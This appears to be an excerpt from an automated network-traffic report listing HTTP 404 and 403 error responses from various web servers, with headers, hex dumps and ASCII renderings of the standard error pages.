Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 09:00:13 GMTServer: Apache/2.4.38 (Debian)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.38 (Debian) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 09:00:14 GMTServer: Apache/2.4.38 (Debian)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.38 (Debian) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 18 Mar 2024 09:00:14 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 18 Mar 2024 09:00:14 GMTContent-Type: text/htmlContent-Length: 3650Connection: keep-aliveETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.2Date: Mon, 18 Mar 2024 08:50:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 38 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 19 9a e8 19 21 2b d1 07 59 02 32 54 1f ea 40 00 da 1e 3f 07 a9 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 84(HML),I310Q/Qp/K&T$'gd*HN+I-0D7(bTgU!+Y2T@?0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100content-type: text/htmllast-modified: Thu, 26 May 2022 20:57:43 GMTetag: "999-628fe9c7-e6c1e44f7938700c;gz"accept-ranges: bytescontent-encoding: gzipvary: Accept-Encodingcontent-length: 1159date: Mon, 18 Mar 2024 09:00:16 GMTserver: LiteSpeedplatform: hostingerData Raw: 1f 8b 08 00 00 00 00 00 00 03 85 56 6d 8f db 36 0c fe 9e 5f a1 ba 1f 92 6c b6 e5 dc f5 35 b1 b3 f5 75 18 b0 f5 06 f4 0a 74 b8 1d 06 46 62 6c f6 64 c9 95 94 4b b2 5e ff fb 20 3b 6f f7 92 cd 80 62 8b 7c 48 51 0f 45 2a f9 a3 b7 67 6f ce ff fc e3 1d ab 7c ad a6 bd 3c bc 98 02 5d 16 11 ea 64 e1 22 d6 58 9c d3 aa 88 84 d1 1e b5 1f b3 ca fb 66 cc 79 b3 b0 2a 35 b6 e4 d6 39 3e 4a 33 5e 1b b9 50 e8 f8 06 c8 99 14 f7 c1 52 70 8f b6 76 9c cd 0d cc 77 fa 55 ad b4 4b 85 a9 79 10 f3 2c 1d 71 66 ca 9d da 94 4d 5a 23 d7 ee 31 b3 72 ee 76 f2 e5 72 99 2e 4f 5b c7 27 59 96 f1 6c c4 ad 9c 27 4e 54 58 c3 63 e6 c8 ec 43 08 86 2d 32 48 5b 57 e1 c3 1f d1 fb 75 83 01 72 65 8e ad f6 84 67 27 3c e8 b9 30 16 1f b3 95 93 47 90 23 fe f9 f7 df 3e 76 31 45 d3 5e 2f af 10 e4 b4 c7 18 63 79 8d 1e 5a ab 04 bf 2e e8 ba 88 de 74 ec 25 e7 eb 06 23 b6 e1 b2 88 3c ae 3c 0f c9 99 30 51 81 75 e8 8b 4f e7 ef 93 17 d1 c6 8f f3 6b 85 2c 44 bd c1 0a e7 36 ba f0 fc bc 31 62 51 67 35 d9 69 2e 74 f9 d7 58 28 03 57 97 f1 a1 30 b9 27 93 e0 21 79 48 b1 7a 48 9a 6e 65 07 a2 3d f0 36 ae 22 89 63 6d fc 60 3b 49 40 53 0d 1e 87 ec db 0e 18 1e 49 ae 51 b0 1e 33 6d 34 b2 47 54 37 c6 7a d0 7e bf 9d ef bd dd 67 d8 d8 dc d8 fa 98 8f 99 32 e2 ea 41 cb 10 c6 26 82 c4 55 74 d7 c3 35 39 9a 91 22 bf 1e b3 8a a4 44 fd 1f 5e 44 65 ec 1d fb c6 38 f2 64 f4 98 c1 cc 19 b5 f0 78 68 df a6 93 b7 f9 3c 76 46 3e 27 9f 5e 25 6f 4c dd 80 a7 99 3a 3c 26 bf be 2b 50 96 18 1d 5a 6a a8 b1 88 ae 09 97 81 ad 03 f0 92 a4 af 0a 89 d7 24 30 69 27 31 23 4d 9e 40 25 4e 80 c2 62 b4 75 e4 c9 2b 9c 9e 99 c6 c5 cc 99 1a 7d 45 ba 64 ca 38 9f f3 4e 77 6f 41 89 4e 58 6a c2 46 0f d6 ec 5c 28 63 ae 1c 53 74 85 cc 57 c8 1a 28 91 91 6b fd a5 ec a3 07 eb d9 da 2c 2c 5b e2 cc 91 47 66 74 8b 13 15 42 93 6e 63 52 a4 af 58 8d 92 a0 88 40 a9 88 59 54 45 d4 12 e7 2a 44 1f b1 ca e2 bc 88 78 e5 a5 11 ee 6f b4 d6 d8 8e d8 74 5f 1d 9d 9b 23 a6 81 74 37 e6 bc 86 95 90 3a 9d 19 e3 9d b7 d0 84 49 68 56 3b 01 3f 4d 4f d3 e7 a1 e8 f6 b2 b4 26 7d 6f a1 db 7e e7 46 7b 97 96 c6 94 0a a1 a1 ae 03 0a e7 7e 9a 43 4d 6a 5d 9c 35 a8 7f fc 08 da 8d 4f b3 2c 3e cd 32 8a 9f 64 59 18 14 3f cb b2 30 28 7e 9e 65 61 50 fc 22 cb c2 a0 fb 4c 4c 7b 9b 2e d1 66 64 df 16 06 f3 85 16 21 43 03 8a 5d 6c e2 32 b6 31 c4 f5 f0 1b 5d f4 7f 69 a3 7a a5 41 ad 3d 09 77 36 fb 82 c2 f7 2f 0b 3b a1 0b 7b 59 84 9f 9b 9b 9d fd f0 f6 11 6f 9d 07 48 fa b5 e8 5e 37 37 17 97 c3 b4 59 b8 6a 00 b6 5c d4 a8 bd 1b 7e 8f 5b a5 2a 46 3f 68 5c b2 b7 e0 71 30 9c 40 e1 52 61 11 3c be 53 18 80 03 33 8c 6f b9 af 0b 97 96 e8 37 6a f7 7a 7d 0e e5 07 a8 71 60 86 17 d9 e5 04 52 70 6b 2d 8a d1 04 52 67 45 51 4e ea b4 01 8b da 7f 30 12 53 d2 0e ad 7f 8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 09:00:16 GMTServer: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1Vary: accept-language,accept-charsetAccept-Ranges: bytesConnection: closeContent-Type: text/html; charset=iso-8859-1Content-Language: enExpires: Mon, 18 Mar 2024 09:00:16 GMTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 49 53 4f 2d 38 38 35 39 2d 31 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 70 6f 73 74 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0d 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0d 0a 3c 70 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a 0d 0a 20 20 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0d 0a 0d 0a 20 20 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 3c 70 3e 0d 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0d 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 70 6f 73 74 6d 61 73 74 65 72 40 6c 6f 63 61
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 09:00:18 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 18 Mar 2024 09:00:18 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 18 Mar 2024 09:00:20 GMTContent-Length: 1254Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 30 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 97 20 4e 69 65 20 6f 64 6e 61 6c 65 7a 69 6f 6e 6f 20 70 6c 69 6b 75 20 6c 75 62 20 6b 61 74 61 6c 6f 67 75 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 18 Mar 2024 09:00:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Web serverDate: Mon, 18 Mar 2024 09:00:14 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveX-Detail: 0x1210, insufficient security levelData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>Web server</center></body></html>
